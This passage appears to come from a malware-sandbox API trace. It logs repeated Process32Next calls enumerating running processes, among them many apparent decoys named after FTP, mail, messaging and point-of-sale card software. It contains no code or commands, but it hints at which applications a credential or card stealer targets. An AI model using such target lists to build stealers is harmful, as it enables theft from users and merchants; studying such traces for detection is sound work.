lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.243] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.246] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.252] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.255] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.257] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.259] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.261] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.264] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.266] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.270] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.272] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.274] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.279] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0216.281] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.283] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0216.285] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.288] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0216.294] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0216.296] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0216.300] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0216.302] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0216.305] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0216.307] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.311] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.314] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0216.316] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.318] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.323] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0216.325] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0216.328] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0216.330] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0216.337] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0216.340] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0216.342] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0216.345] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0216.348] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0216.350] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0216.352] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0216.355] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0216.357] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0216.360] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0216.362] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0216.365] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0216.367] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0216.370] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0216.374] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0216.376] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0216.379] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0216.382] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0216.385] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0216.388] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0216.391] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0216.394] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0216.399] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0216.402] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0216.404] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0216.407] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0216.411] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0216.417] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0216.420] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0216.422] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0216.426] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0216.429] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0216.431] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0216.434] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0216.436] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0216.439] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0216.442] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0216.444] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0216.447] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0216.449] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0216.452] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0216.458] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0216.461] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0216.464] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0216.466] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0216.469] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0216.472] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0216.475] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0216.477] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0216.480] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0216.483] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0216.485] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0216.488] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0216.491] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 